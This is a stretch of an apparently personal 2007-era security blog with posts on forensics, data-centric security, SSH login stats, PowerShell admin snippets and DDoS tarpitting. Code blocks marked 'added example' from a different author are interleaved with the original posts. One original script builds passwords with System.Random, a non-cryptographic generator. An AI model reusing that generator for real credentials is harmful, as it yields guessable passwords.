A quick excerpt from a CIO article. Without details, it is tough to separate fantasy (or simply blind speculation) from reality, but I think this story may just ring true. The article is focused on how difficult forensics is becoming as criminals employ more antiforensics tactics. Personally, I don't think it has gotten any worse to track down criminals over the wires; there is just more money involved these days. (On-disk forensics notwithstanding.) (Update: I see more discussion here from keydet89!)
    A clear illustration of this fact comes from the field investigations manager for a major credit services company. Sometime last year, he noticed a clutch of fraudulent purchases on cards that all traced back to the same aquarium. He learned quite a bit through forensics. He learned, for example, that an aquarium employee had downloaded an audio file while eating a sandwich on her lunch break. He learned that when she played the song, a rootkit hidden inside the song installed itself on her computer. That rootkit allowed the hacker who’d planted it to establish a secure tunnel so he could work undetected and “get root”—administrator’s access to the aquarium network.

    Sounds like a successful investigation. But the investigator was underwhelmed by the results. Why? Because he hadn’t caught the perpetrator and he knew he never would. What’s worse, that lunch break with the sandwich and the song download had occurred some time before he got there. In fact, the hacker had captured every card transaction at the aquarium for two years.
    As a side rant, I really hate how a not-large article turns into 10 page "turns" on news sites these days. I mean, come on, everyone can see through this little "click more to serve more ads" scheme. It actually conditions me to look for the Print icon to view the printable version that, amazingly, has no ads and displays on one page.
    .: ranting about data-centric security and the media
    Random link from Full-Disclosure: mlabs.secniche.org

    I hate to post more rants than useful content on here, but this week has been too busy for much more than ranting. I saw an article about the dangers of unauthorized teleworkers, that is, those workers who bring work home with them and possibly work on their home computers.
The report found that 63 percent of respondents who worked from home unauthorized -- more than half of the non-teleworkers surveyed -- used their home computers in doing that work. "People were saving documents on their home computers that were unprotected," said Josh Wolfe of Utimaco, a data security company that underwrote the study.

    ...

    "We're not sure if these people are dealing with spreadsheets with Social Security numbers on them or something more mundane than that," Wolfe said.
    I like security, and I like to think I have a (healthy) paranoid/security-conscious mind, but I really believe we can go too far very easily. While government employees maybe shouldn't take work home with them (and yes, I pointed out that second blurb to show that maybe all those workers had non-sensitive materials and were working on presentations or some junk), I hate when articles like this make their way to other circles and present things without proper context (I expect to see this study referenced in non-government articles soon...). Take a small start-up company. Yes, those people likely take work home with them, it happens, it is natural, and at some point every single one of us does it.

    Yes, we have to be conscious of our data leaving the confines of our happy networks, but we can't obstruct our users trying to make the business successful. That's one of the (few) issues I have with data-centric security. Trying to secure the data eventually impacts the success of the business and the happiness of the people.

    One other note I had from the article is about how data-centric security really only works when you can classify your data and separate the sensitive or confidential stuff out. Data-centrism is great for that classification and for being conscious of the security of your really sensitive data, but it breaks down and is ineffective and inefficient for the rest of the data. It can also be theoretically effective when you just declare "all information is sensitive so let's encrypt everything!" But that gets into a realm that is just not really going to be possible yet, at least at the level of near-perfection that statement alludes to while allowing employees to do their work and be an asset.

    Maybe this is just the media being way too sensational about digital security still. We don't see dramatic reports about how people's homes are insecure because, while we have a deadbolt in front and back, our windows can be smashed, oh my. Security isn't perfect and never will be, and I'll continue to bristle when media or persons have an underlying tone that anything less than perfection is inadequate. Maybe our industry does get it, but damn if the media still stirs us up and gets our blood going still.

    Maybe I should further limit my chosen media outlets away from journalists...hehe! Hell, I've been tracking the front page daily headlines on cnn.com and it reads more like a tabloid or YouTube front page than anything anymore...
    .: malware staging points in windows registry
    F-Secure (and Andy, whose blog I checked first!) posted about the most common registry locations that malware tries to start from on Windows. Not only is this list highly useful to check in response to an incident, but like any good baseline, this is a list of locations that all admins should be familiar with even before an incident. It doesn't help to have an incident, check one of these locations, and not know what those other 25 entries do. That is wasted time trying to isolate which one is out of place. Check these locations out now and see what is really going on with your system. I even filed this into my always-being-built wiki.
    .: why raid does not work in the home
    George Ou has recently taken up the torch of demystifying RAID for average users so they can reap the benefits. Unfortunately for George, I agree with his detractors that say RAID isn't going to fly in the home. Honestly, RAID makes even geek heads spin sometimes, including my own, and managing one's RAID setup is really up there with changing your own oil: not everyone does it or wants to do it. In fact, most average people really couldn't give a fuck about RAID; they just want to backup their data.

    I think George should stick to the easy things when it comes to consumer-level storage. Educate people about regular backups using one of two methods: drag-n-drop or NT Backup (or both!). And for media, educate people to use one of four options: external hard disk, USB key (or two), cd burning, or dvd burning. Drag-n-dropping data is natural, and people just have to think about what they would want backed up, drag it over (or burn it), and set it aside in a safe place. If people don't understand or know what they all need, use NT Backup and in the event of a disaster (on consumer levels, i.e. a hard disk gone bad) have that on hand for techies to restore.

That really should be the extent of trying to educate the masses. Granted, it is not pretty or scalable, but it gets the job done and goes only as far as most consumers really care to go. (Honestly, I'm not sure who George's audience is, technically proficient people who already know this stuff or technically unskilled people who shouldn't be bothered with RAID...either way, he's seeming a bit lost on this effort.)
    .: has the tuberculosis guy even apologized yet?
    Unless you're like Marcin and aren't aware of your surroundings for weeks at a time (hehe!), you likely know about that guy who has a strain of Tuberculosis and decided to fly halfway around the world and then purposely circumvent security to come back to the US. If someone has seen that this winner of a guy has ever posted or spoken an actual apology yet, please let me know. I've yet to see one, and seeing one would assuage my anger...

    To bring this back a bit, do you know who the cowboys in your organization are who know security but choose to circumvent it and take big gambles with people's welfares? Do they ever apologize? Do they ever reform?
    .: openvpn server on ubuntu 7
This weekend I finally (after way too long) got my OpenVPN setup to work as desired. I had plenty of workarounds ready, but I was pretty determined to get this working the way I wanted. I think my problem was twofold. First, I needed to turn on ipv4 forwarding on the Ubuntu OpenVPN server. I will be testing this today to see if that really was needed. Second, the Linksys WRT54G router was set up wrong. Not sure what I was thinking, but I corrected the problem this weekend and everything was happy. So I blew away the server VM and rebuilt it without all my little troubleshooting settings and commands to better isolate only exactly what I need to rebuild the system. I'll provide more details on my install hopefully later this week. After a few more builds, I expect to save a post-install snapshot finally.
    .: university of iowa data breach
I have not been made aware of being a victim (or potential victim) in any of the large-scale data breaches so far (I don't shop at Marshalls/TJX and I only use one credit card for the most part anyway...I still like cash the most!), but I know someday I will. A little closer to home, I see this morning that "more than a thousand" people have been notified about a data breach at the University of Iowa. Why this breach only exposed "more than a thousand" people, I'm not sure. All the other tired prerequisite PR notes are given such as "No evidence that personal information is being misused...". I have no evidence that I might be involved in a car accident today, but that won't stop it from possibly happening.

    While this is closer to home, I will note I graduated from Iowa State University, not U of I.
    .: powershell random password generator
    This morning I decided to replace part of a script I own at work with a random password generation function. This was easier than I thought it would be. This function takes a number that should be greater than 4, and returns back a random password of that length. The character sets are pretty obvious inside the function and can be adjusted as needed. The password generated assures the first 4 positions will always be a number, capital letter, lower case letter, and symbol, respectively, to meet some complexity requirements. The rest of the positions are a random character chosen from a random character set.
function RandomPassword ([int]$intPasswordLength)
{
   if ($intPasswordLength -lt 4) {return "password cannot be <4 chars"}

   $strNumbers = "1234567890"
   $strCapitalLetters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
   $strLowerLetters = "abcdefghijklmnopqrstuvwxyz"
   $strSymbols = "!%^&*()+=/?{}[]~,.<>:"
   # System.Random is seeded from the clock; it is not a cryptographic generator
   $rand = new-object random
   # start from an empty string so += appends characters instead of summing char codes
   $RandomPassword = ""

   for ($a=1; $a -le $intPasswordLength; $a++)
   {
      # positions 1-4 take sets 1-4 in order; later positions pick a set at random
      if ($a -gt 4)
      {
         $b = $rand.next(0,4) + $a
         $b = $b % 4 + 1
      } else { $b = $a }
      switch ($b)
      {
         "1" {$b = "$strNumbers"}
         "2" {$b = "$strCapitalLetters"}
         "3" {$b = "$strLowerLetters"}
         "4" {$b = "$strSymbols"}
      }
      $charset = $($b)
      $number = $rand.next(0,$charset.Length)
      $RandomPassword += $charset[$number]
   }
   return $RandomPassword
}
RandomPassword 36
    No doubt there are other functions and solutions to this, but I kinda just wanted my own.
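As an added example (my code, not the blog's script), here is the same layout rewritten around a cryptographic RNG, with rejection sampling so every character in a set is equally likely; it goes one step beyond the original by shuffling the result so a character's class cannot be read off its position. The function names and the 16-character default are my own.

```powershell
# Uniform integer in [0, $Max) from a cryptographic RNG. A plain "byte % $Max"
# favours the low values whenever 256 is not a multiple of $Max (modulo bias),
# so bytes above the last full multiple are thrown away and drawn again.
function Get-UniformIndex {
    param(
        [System.Security.Cryptography.RandomNumberGenerator]$Rng,
        [int]$Max
    )
    $buffer = New-Object byte[] 1
    $limit = 256 - (256 % $Max)
    do { $Rng.GetBytes($buffer) } while ($buffer[0] -ge $limit)
    return [int]($buffer[0] % $Max)
}

function New-RandomPassword {
    param([int]$Length = 16)
    if ($Length -lt 4) { throw "password cannot be <4 chars" }

    # same four character classes as the original script
    $sets = @(
        "1234567890",
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
        "abcdefghijklmnopqrstuvwxyz",
        "!%^&*()+=/?{}[]~,.<>:"
    )
    $rng   = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $chars = New-Object System.Collections.Generic.List[char]
    try {
        for ($i = 0; $i -lt $Length; $i++) {
            # first four positions take one class each (digit, upper, lower,
            # symbol); the rest pick a class at random, as the original does
            if ($i -lt 4) { $set = $sets[$i] } else { $set = $sets[(Get-UniformIndex $rng $sets.Count)] }
            $chars.Add($set[(Get-UniformIndex $rng $set.Length)])
        }
        # Fisher-Yates shuffle: every class is still present, but position no
        # longer tells an attacker which class to expect there
        for ($i = $chars.Count - 1; $i -gt 0; $i--) {
            $j = Get-UniformIndex $rng ($i + 1)
            $tmp = $chars[$i]; $chars[$i] = $chars[$j]; $chars[$j] = $tmp
        }
    }
    finally { $rng.Dispose() }
    return -join $chars
}

New-RandomPassword 36
```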
    .: more art of war quotes related to security
    Couple quotes I like. Andy already mentioned one, but I thought I would mention it again along with the previous days' quote on our Art of War calendar.
    "When your strategy is deep and far-reaching, then what you gain by your calculations is much, so you can win before you even fight. When your strategic thinking is shallow and near-sighted, then what you gain by your calculations is little, so you lose before you do battle." The Art of War, Chapter 1 On Assessments
    And...
    "When the army is old, the soldiers are lazy, and the discipline and command are not unified, this is an opponent that has already lost." The Art of War, Chapter 4 Formation
    .: powershell scripting for active directory
    I've been doing more scripting lately, and thought I should document (for myself) some of the stuff I've been using. Rather than spit them out here, I put them on the wiki. Here are some snippets of what I use. We use these scripts when building new development environments and servers. Nothing ground-breaking, but still useful as inspiration if anyone else is working around PowerShell.

    Create Windows services
    Building LDAP container and object strings
    Process and create OUs
    Create an Active Directory Group
    Create an Active Directory User
    Open and search XML files
    .: ssh server stats and reduced risk
    I've had an SSH server up for some time on the default port 22 tcp on a Windows box. The other day I finally moved it over to a virtual Ubuntu box where it will stay indefinitely. While SSH was running on Windows, I logged all failed attempts. I didn't expect Amsterdam to outpace Asia! Also, I suspect these were all automated attempts since root was tried the most. Using Cygwin on Windows, I don't have a "root" account. In fact, "Administrator" was never even attempted once (what the hell?). Go figure.

    This brings me back to a recent thread on the Security-Basics list hosted at SecurityFocus where a lot of people got pretty heated up about whether changing the default SSH port or using port knocking is an effective security measure. There were impassioned responses on both sides of the equation, and in a way, they were all somewhat correct. But I think it is more accurate to say changing the SSH default port is not a security enhancement, technically, but does reduce the risk of that service. Risk is decreased, and in a more high-level way of defining "security," the security of the box was increased. This does not mean SSH became more secure or the box magically became more secure... Really, it just came down to semantics (mostly).

The stats above help illustrate the risk my SSH server faces. If the SSH port had been moved, I would honestly be surprised if I had a dozen failed login attempts. That illustrates reduced risk. I'd also be able to identify my threats a little better. Someone with 5 failed attempts on my obfuscated SSH port may indicate a targeted attacker as opposed to an automated worm scanning for SSH. If someone was able to port knock my SSH open to make failed attempts, that might perhaps indicate my port knock sequence was sniffed somewhere or an insider is attempting something fishy.
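To turn the tally described above into something repeatable, here is an added example (mine, not the blog author's) that parses OpenSSH "Failed password" lines, counts failures per source and per username, and separates the high-volume sweeps from the few attempts against a real account that the post singles out as worth a closer look. The log lines, the account list ("mike") and the threshold are constructed assumptions.

```powershell
# Constructed sshd log lines for the example (documentation-range addresses, not real traffic)
$sampleLog = @'
Jun  3 02:14:07 gateway sshd[4031]: Failed password for root from 198.51.100.7 port 52310 ssh2
Jun  3 02:14:09 gateway sshd[4031]: Failed password for root from 198.51.100.7 port 52311 ssh2
Jun  3 02:14:12 gateway sshd[4035]: Failed password for invalid user admin from 198.51.100.7 port 52314 ssh2
Jun  3 02:14:15 gateway sshd[4038]: Failed password for invalid user test from 198.51.100.7 port 52317 ssh2
Jun  3 03:40:51 gateway sshd[4102]: Failed password for invalid user oracle from 203.0.113.22 port 40110 ssh2
Jun  3 03:40:53 gateway sshd[4102]: Failed password for root from 203.0.113.22 port 40112 ssh2
Jun  3 09:12:30 gateway sshd[4410]: Failed password for mike from 192.0.2.45 port 61002 ssh2
Jun  3 09:12:44 gateway sshd[4410]: Failed password for mike from 192.0.2.45 port 61003 ssh2
Jun  3 09:13:01 gateway sshd[4412]: Accepted publickey for mike from 192.0.2.45 port 61004 ssh2
'@

function Get-SshFailureReport {
    param(
        [string[]]$Lines,
        # accounts that actually exist on this box (assumed for the example)
        [string[]]$ValidUsers = @("mike"),
        # more failures than this from one source is treated as an automated sweep
        [int]$SweepThreshold = 3
    )
    # "invalid user" appears only for names that do not exist on the box
    $pattern = 'Failed password for (?:invalid user )?(?<user>\S+) from (?<ip>[\d.]+) port \d+'
    $failures = foreach ($line in $Lines) {
        if ($line -match $pattern) {
            [pscustomobject]@{ User = $Matches['user']; Source = $Matches['ip'] }
        }
    }
    $report = foreach ($g in ($failures | Group-Object Source)) {
        $users = $g.Group | ForEach-Object { $_.User } | Sort-Object -Unique
        $hitsValid = @($users | Where-Object { $ValidUsers -contains $_ })
        # many guesses = scanner noise; a handful aimed at a real account is the
        # case the post flags as a possible targeted attacker
        $verdict = if ($g.Count -gt $SweepThreshold) {
            "automated sweep"
        } elseif ($hitsValid.Count -gt 0) {
            "few tries against a real account: look closer"
        } else {
            "low volume, guessed names"
        }
        [pscustomobject]@{
            Source   = $g.Name
            Failures = $g.Count
            Users    = ($users -join ",")
            Verdict  = $verdict
        }
    }
    return $report | Sort-Object Failures -Descending
}

$lines = $sampleLog -split "`r?`n"
Get-SshFailureReport -Lines $lines | Format-Table -AutoSize

# the "which username was tried most" view from the post; root leads in the sample too
$lines | ForEach-Object { if ($_ -match 'Failed password for (?:invalid user )?(\S+) from') { $Matches[1] } } |
    Group-Object | Sort-Object Count -Descending | Format-Table Name, Count -AutoSize
```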
    .: redux on 4 deadly security sins
    I'll always say I like lists. C-levels like lists, average people like lists, techies need to like lists. :) Over at ZDNetAsia, Scott Montgomery, global vice president for product management at Secure Computing, gave his take on 4 damaging security habits in the corporate world. Here are my responses/takes. Overall, I like this succinct list, and with minor quibbles, it's a good list.

    1. Fixed Passwords - Fixed passwords, in my mind, are adequate. They aren't the best practice and best thing to use, but they are still by far the most economical for most corporations and people. We know passwords, we're used to them, and they tend to be just fine when properly complex and rotated. If one-time passwords were so useful, why are they so difficult to roll out or scale up to our needs? They are because you need a lot of levers and gears aligned in a corporate environment to be able to effectively implement such solutions. No single-sign-on possibility in your shop? Then one-time password tokens are not yet for you.

    2. Neglecting inbound threats from e-mail, the Web and instant messaging - Montgomery gets this one correct, and not much I can add to it other than nitpicking about the term "threat" used for an attack vector.

    3. Forgetting that data traffic is two-way - I think this is another good point, although I think we can all admit trying to get our arms around egress is like trying to hold down a very large bear or herd cats. I think that is a major reason so many of us are behind here: we have other easier things to tackle. But certainly, we should keep this in mind. But always think about this: how do you stop me from uploading data to a web server that I own? How do you stop me from uploading data through an encrypted channel on port 80 outbound? These are difficult to stop in many shops, without spending some good money on solutions. Hence...they do get left behind.

    4. Not encrypting data - I don't like bashing lack of encryption by using email as an example. Sadly, SMTP is broken and obsolete, but like the SSN, it is so widely used and relied upon... He also dives very deeply into the FUD by saying unencrypted mail is public like a paper. No, it's not, but he still brings up a good point. Encryption should be used whenever possible on the wire, and on the disk. We'll only slowly move in this direction due to compatibility issues.
    .: 10 reasons why the Black Hats have us outgunned
    Another interesting list, this one on 10 reasons why the Black Hats have us outgunned. I won't hit every point, but here are a few things I want to add.

    Becoming a Black Hat is a career option even for those who are not super geeks. Very true, and we can see this in the news reports of the people who get caught. They tend to be on the fringe of being a geek, really, especially the stupid spammers. They don't strike me as particularly skilled at anything beyond their one opportunity and a few tools (hence maybe why they get caught!).

Not all businessmen are entirely averse to the odd hack (on a competitor). I truly wonder exactly how many executives and "high-powered" business persons have a true level of morality. I doubt many do. I expect many have fudged numbers, told white lies, and done some less-than-ethical leveraging and information gathering. When you have money and power at your disposal and you need to protect both, I think a lot of people slide down a rather immoral slope very quickly. If I were a multi-billion-dollar company in a major city with interests to protect, would it be much skin off my teeth to hire someone to sit at the airports all day and "probe" the wireless travelers? Or maybe at my competitor's airport? I still expect this "career option" to grow, whether I agree with it or not.
    .: the comforting boundaries of scripting
    As I've been doing a heck of a lot of PowerShell scripting the past few weeks at work, I've come to re-appreciate the comfort of being able to work in a very bounded environment. Network/Systems/Security work is pretty damned unbounded, but when you work on a programming or scripting language, you don't have to necessarily sweat the scope or mechanics because they're created for you, for the most part. You deal with the basics, loops, variables, moving data around, manipulating data, reading and writing to objects, and so on. It's like putting together a jigsaw puzzle; there's something comforting in the ability to focus. Plus the immediate response/results of scripting are really nice.

    I stayed away from scripting, and more appropriately, programming when I was in college and just out of college because I didn't want to find myself being a kickass XYZ programmer and only a kickass XYZ programmer while languages A, B, and C flew by. Maybe in another life or a future career opportunity will open up a more dedicated scripting/web dev job opp. I think I could live with that, honestly. I think it would have to be a smaller company, though, rather than just being the builder of Function A in Large, Slow, Non-Creative Company.

    Maybe that's why every couple years I perform some deep rework on my web pages, or have an affinity towards scripting. Once you know the mechanics and syntax and keywords of a language, it is all downhill from there (at least for me, since the logic comes easy to me). Braindump Ruby on Rails into my head, and I could probably have a lot of fun with that language, as much as Neo with Kung-Fu.

    Anyway, my PowerShell snippet today involves deleting services. Creating services is pretty easy in PS, but deleting them was left behind for WMI to pick up. And no reboot is required. (Unless you have a service open at the time you attempt to delete it, in which case Windows will hang on that and hold the service for deletion until you reboot...so make sure you're not working in the service anywhere before you try to trash it.)
    $service = gwmi win32_service | ? {$_.name -match "ServiceName"}
    $service.delete()
    Since this is short, I tend to do this manually, and I try to always make sure $service returns the proper service by calling it once just before the delete. And you do this to remote computers by adding "-computer 'computername'" before the pipe (and with double quotes instead of my grammatically correct singles).
    .: the swear jar
    The Swear Jar (work safe) (heard this in the office and also from FurryGoat). Seriously, if you can't have this bit of fun in your office at some point, I wouldn't want to work there. People don't do great things by being in an oppressive or unfun environment. Hell, people just aren't optimally productive in such environments. (Ok, minus the lobby area announcement, hehe.)
    .: working with the registry in powershell
    There's a bunch of different ways to play with the registry in PowerShell. My latest script snippet that I wanted to preserve on here deals with a couple ways to add registry keys and values. For as cool as this is, however, I don't believe PowerShell is able to make such changes to remote registries without using other methods. When in doubt, I guess I could just Invoke-Expression psexec.exe someregfile.reg and have it done there, but hopefully PowerShell gets remote registry scripting ability eventually, as this would be the next way to script mass registry changes to people beyond Group Policy.
    .: google in iowa and hells grow colder
    Anyone know anyone at Google or in the Omaha area with any ties to Google's expansion to Council Bluffs? That's not really a place I care to live (I'm originally from Sioux City about 90 miles up the river although I live in Des Moines now), but a stint at Google? That'd potentially be pretty sweet. And really, the Omaha/Council Bluffs pair is not a bad place at all.
    .: computerworld list of top 100 companies to work for
Dan Morrill pointed over to ComputerWorld's annual best places to work survey. I clicked the list of 100 companies expecting to see ComputerWorld advertisers, the same old big guns like Google and Microsoft and Yahoo!, and other large companies that can have lots of day-to-day IT grunts write in praises on the surveys (seriously, there are tons of little surveys on Best Company for ____ that are simply getting 80 of your own employees to write in and overwhelm the voting...), but, I was pleasantly surprised to continuously say, "who? who are they? huh?" to many entries. This intrigues me a lot, and makes me kinda wonder what some of these smaller, unexpected entrants do with their IT operations and workforce to be such good places to work. Almost anyone should be able to take the top 20 in this list and get good material from them for case studies... And by "smaller" I mean smaller than the biggest companies that I expected.

    I really think there are many, many smaller and start-up type companies that are amazing places to work for, especially if they have predictable income (which sometimes is tough because so many want to be Yahoo rather than a long-term small company that maintains a solid existence without trying to eat the whole cake...). Hrm, yes, I still have a bug to find something better...
    .: piedmont's audit questions and requests
If you didn't think auditing and security were going to be a growing field, add this to the reasons you should stop being naive. ComputerWorld posted a series of questions and requests reportedly made by HHS to Piedmont Hospital as part of a (surprise?) HIPAA audit. Keep in mind that it seems Piedmont only had 10 days to submit the answers. That basically means having it all done and ready, not trying to slap it together during a couple 120-hour weeks. (And even if they did that, any even minor interview with IT techs will reveal the wide eyes and confusion about the superficiality of anything slapped together.)

    Likewise, if these questions don't make you gulp at least a dozen times, you might be living in a dream world. Lots of people talk about security enabling business and ROI and things like that, but there is still going to be a growing field of people just taking care of the back rooms, because these things simply cannot be tacked onto "enabling" projects or expensed properly by a project or business initiative.

    I am also very confident that these questions en masse cannot and never will be answered or tracked by any one product no matter how unified it is. Technology changes too quickly and there is too much of it. By the time products dig in and solve something like Windows 2000, then Windows XP is released. And then Vista. And then wireless. And then new attack vectors arise like wireless driver attacks, plus "arguable" attacks like DRM-justified rootkits. And then businesses that simply have to retool their infrastructure every 4-5 years, plus all the homegrown glue that holds everything together. And the changing landscape of almost every business. And the fact that while each company only has a handful of problems when it comes to IT, there are unlimited solutions free and commercial... Oh man, headache...!

    A product can never do all this, nor can a CSO/CISO alone. There will continue to be backroom people, unless we want to just do security on a superficial surface level or make our networks much more homogenous such that Company A's setup is almost exactly the same as Company B's setup. No product can do that, although you can argue that service providers may have a chance...but no service provider will be able to scale up to provide for every company even in their own city, let alone make a dent on larger companies or on a wider scale.

    I know I'm slightly keeping Rothman in mind when I say the back room is not going away, but I firmly believe all of this just goes back to being as pragmatic as possible when managing security. I still need to get my hands on his book... :)

    Update: I know that these questions may be no different than people are being treated to with SOX and HIPAA, but still, how many have really been able to take either of those 100% seriously and adhere to them? Like PCI, it's all about the teeth...maybe cyberinsurance will add the teeth, I dunno. But I would amateurishly estimate that 98% of all businesses would have major infractions from any audit performed, PCI, SOX, or HIPAA.
    .: don't worry about the iphone yet
    There is talk about the iPhone's implications to security. I think it is important that anyone discussing this make it clear where their perspective lies: from the eyes of an autonomous home consumer or the eyes of corporate IT. From the eyes of a home user, my condolences, but I really expect this device to be no different than any other, and likely exploitable. For the business perspective, this is no different from any other phone or USB key fob on the market.

1. Limit/disable USB/Bluetooth ports on your laptops and desktops.
2. Only officially support the use of approved devices, of which there should be few, and they should be manageable from something like a BES server.
3. Make sure you know what MACs are on your network, and if an iPhone is able to get onto your Ethernet network, be sure you have alarms and possibly port security on your network.
4. (Optionally) Disallow, by policy, the use of home phone devices to transmit corporate email to and from. You might not be able to effectively audit this, but you better let people know they shouldn't be doing it in the event you find out they are.

If you don't already do the above corporate security measures, you have no business worrying about the iPhone. If you already do the above corporate business measures, you have no business worrying about the iPhone beyond deciding how long to wait before allowing it as an approved device for syncing and official use (or when to put the final "PERMA-DENIED" stamp down).
    .: hungry, hungry printer
    Workplace geek humor time! One of those sounds that just always makes me grin in eerie pleasure when sitting in my cubicle is the sound of print job white noise unceremoniously turning into a printer quietly eating the paper. Not just printing, but jamming up and eating the paper; the pleasant crinkling that indicates things are not well...sure to give me a grin!

    Bonus points if someone walks over in the next 15 minutes and starts swearing softly and sounding like they're banging every lid tray and movable plastic piece on the printer...that sadistic side of geek humor, that!
    .: paradise by the dashboard lights
    Mr. Buddha, Mark Curphey, mentioned dashboards recently, which got me all giddy at the link he provided to a site about information dashboards. I love me some dashboards. I love them enough that I have a section of my menu on the right devoted to security dashboards. Dashboards are used to distill relevant information down to a, hopefully, more visual representation of your reality. Not only that, but have you ever had someone in the management chain above you go gaa-gaa over the pretty pictures and lights and trends on your desk, even when they have no friggen clue what it all means? People seem to react positively to seeing things like this on a network or security admin's desk. At a previous job, I didn't get too many people walking by wondering what I had up my sleeve for that day, but whenever I turned on a dashboard, I had plenty of people from various job roles wander over and ask what all the lights and colors were for and how "cool" it was. In my mind, it has become part of selling oneself as a technical and security expert.

    Now, I want dashboards at home, someday. I don't know if I will ever become proficient enough to roll my own, but I have plenty of spare systems and monitors around to utilize their extra cycles to display neat metrics and dashboards. Due to my current refusal to "settle," I don't have big furniture in my apartment like a desk or two, so the whole dashboard setup needs to wait a bit more.

    But I thought it worthwhile to write down, for myself, a bit of a wishlist on dashboards I'd like to see on my desk over time. Note that this is at home, although many of these things should be able to scale up to enterprise use. Suggestions for tools are welcome.

    • visual traffic monitoring - like etherape or eve or plenty other tools that give a pretty view of what and where traffic is on the network.
    • less visual traffic monitoring - like a tcpdump scrolling by on a monitor; only tailored down to watch only things really important (and not my workstation streaming web radio...)
    • traffic summary - a summary of traffic levels to web, mail, VPN, SSH servers and so on; even as pared down as simple daily log file sizing.
    • system monitoring - on a basic level, what is up and what is currently down. On a deeper level, system health such as CPU, RAM, and disk usage, running processes, and so on.
    • service monitoring - on an even deeper level, any time traffic to something comes in it can log, throw a visual cue, or send a quick message, for instance a login attempt on SSH or VPN.
    • arp watching - roll your own basic NAC rogue detection on a network by monitoring arp requests in a DHCP network, using arpwatch or arpalert (I think those are the names).
    • security monitoring - tripwire-like integrity detection on important systems, account creation events
    • IDS - things like Snort alerts, although these aren't as useful on a dashboard, per se.
    • threat/vulnerability/external - It is nice to monitor one's own realms, but none of us are islands. We need to know about changing threats, new vulnerabilities, or maybe some trend or new attack vector affecting the security health of the Internet as a whole. There are plenty of these sorts of dashboards available, since they lend themselves well to the web.
    • wireless - kismet just to keep an eye open for new clients and the wireless network in the area
    • wireless spectrum analyzer - run the pretty Wi-Spy tool in a corner to monitor the health of the wireless frequency range.
    Ok, so all of this is pretty personal to me, because I am a firm believer in keeping one's fingers not just in the trenches of the back room, but making sure they are constantly feeling for a pulse, temperature, clamminess, etc. So much about security and IT in general has a fundamental base of monitoring for changes and abnormalities. It's the part of me that is a control/information freak which lends itself well to the field. And yes, I like having a few non-screensaver'd monitors around me showing me what is going on at all times.
    .: http ddos mitigation by tarpitting
    By way of the SecuriTeam blog, I see Joe Stewart has posted a quick technical article about thwarting an HTTP DDoS attack using iptables tarpitting. I also like the cite to a report by Jordan Wiens [pdf] about tarpitting DDoS worms (I've not read it yet). I especially like the graph showing the effects of no action, connection dropping, and tarpitting. As a question to myself, I wonder if the attacked system needs to keep track of those sessions as well, and if that might bleed the server a bit over time? Obviously, this is still better than having the server fall over in the first 5 minutes, while tarpitting likely can allow the server to hold out far longer, even if it still bleeds.

    One thing that Joe leaves unspoken is tarpitting is not to be used for all HTTP requests. Some of those requests are legitimate users and you certainly don't want to tarpit them. Tarpitting should be triggered after a connection is determined to be part of the DDoS, so there is some front-end work to be done. I expect Wiens covers this in the longer paper.
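    The "front-end work" of deciding which connections get tarpitted, as an added example that is not code from Joe Stewart's article or Jordan Wiens' report: it picks flood sources out of access-log lines and emits ipset/iptables commands that tarpit only those sources, leaving other clients alone. It assumes the TARPIT target from xtables-addons and the ipset tool are installed; the log lines, threshold and set name are constructed.

```python
"""Selective tarpitting front end: identify HTTP flood sources from
access-log lines, then generate the ipset/iptables commands that tarpit
only those sources.  Added illustration, not the article's code.
Assumes xtables-addons (TARPIT) and ipset are available; sample data,
threshold and set name are constructed."""
from collections import Counter
import re

# Common Log Format: client address first, request line in double quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)"')

# Constructed sample: one client hammering the front page, two normal users.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2007:09:00:01 -0500] "GET / HTTP/1.1" 200 512',
    '198.51.100.2 - - [10/Jul/2007:09:00:01 -0500] "GET /about.html HTTP/1.1" 200 1780',
    '203.0.113.7 - - [10/Jul/2007:09:00:01 -0500] "GET / HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jul/2007:09:00:02 -0500] "GET / HTTP/1.1" 200 512',
    '192.0.2.9 - - [10/Jul/2007:09:00:02 -0500] "GET /news/ HTTP/1.1" 200 3301',
    '203.0.113.7 - - [10/Jul/2007:09:00:02 -0500] "GET / HTTP/1.1" 200 512',
    '192.0.2.9 - - [10/Jul/2007:09:00:03 -0500] "GET /style.css HTTP/1.1" 200 904',
    '203.0.113.7 - - [10/Jul/2007:09:00:03 -0500] "GET / HTTP/1.1" 200 512',
]

def count_requests(lines):
    """Requests per client address; lines that do not parse are skipped."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            counts[m.group(1)] += 1
    return counts

def flood_sources(lines, threshold):
    """Addresses whose request count reaches the threshold for this batch."""
    return {ip for ip, n in count_requests(lines).items() if n >= threshold}

def tarpit_rules(sources, setname="tarpit-src", timeout=600):
    """Commands that tarpit only the identified sources.

    Entries expire from the set after `timeout` seconds, so a source that
    stops flooding is released without manual cleanup.  The raw-table
    NOTRACK rule keeps tarpitted connections out of the conntrack table,
    which answers the question of whether the defending host has to keep
    state for every held session: with this rule it does not."""
    cmds = [f"ipset create {setname} hash:ip timeout {timeout} -exist"]
    cmds += [f"ipset add {setname} {ip} -exist" for ip in sorted(sources)]
    cmds += [
        f"iptables -t raw -A PREROUTING -p tcp --dport 80 "
        f"-m set --match-set {setname} src -j NOTRACK",
        f"iptables -A INPUT -p tcp --dport 80 "
        f"-m set --match-set {setname} src -j TARPIT",
    ]
    return cmds

if __name__ == "__main__":
    for cmd in tarpit_rules(flood_sources(SAMPLE_LOG, threshold=4)):
        print(cmd)
```

    A fixed count per batch is the simplest possible trigger; in practice you would count per source over a sliding time window (the log timestamp is there for that) and pick the threshold from your normal per-client request rate, so that a busy proxy or a crawler does not get tarpitted along with the flood.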
    .: quote for the day
    A smooth sea never made a skillful mariner. -English proverb
    .: hacking world of warcraft
    Via elamb, The Register has an article on hacking World of Warcraft, and also mentions an upcoming book I didn't know about, Exploiting Online Games: Cheating Massively Distributed Systems, by Gary McGraw and Greg Hoglund.

